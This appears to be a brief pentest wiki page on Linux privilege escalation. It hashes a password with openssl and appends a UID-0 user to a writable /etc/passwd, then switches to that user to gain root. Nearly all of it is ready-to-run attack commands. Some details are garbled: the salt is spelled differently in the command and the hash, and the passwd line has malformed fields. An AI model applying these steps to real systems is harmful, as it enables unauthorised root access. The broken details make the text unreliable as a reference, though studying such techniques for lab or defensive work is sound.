OpenSSL privesc

#This privesc presupposes a low level ssh connection with the ability to edit /etc/passwd

1]From attacking machine create a unique ssl string for a new user: redcliff

openssl passwd -1 -salt redlciff pass123  
 
$1$recliff$NuDUpbLxJXpyH5FN4yqix/

2]From target

ls -la /etc/passwd 

nano /etc/passwd

3] Paste the hashed password for new user at the bottom.

redcliff:$1$recliff$NuDUpbLxJXpyH5FN4yqix/:0:0:/root/root:/bin/bash

Parts highlighted in red need to be added separately.

4]Save file and exit, then switch to new user

su redcliff

pass: pass123

Root

Last updated 3 years ago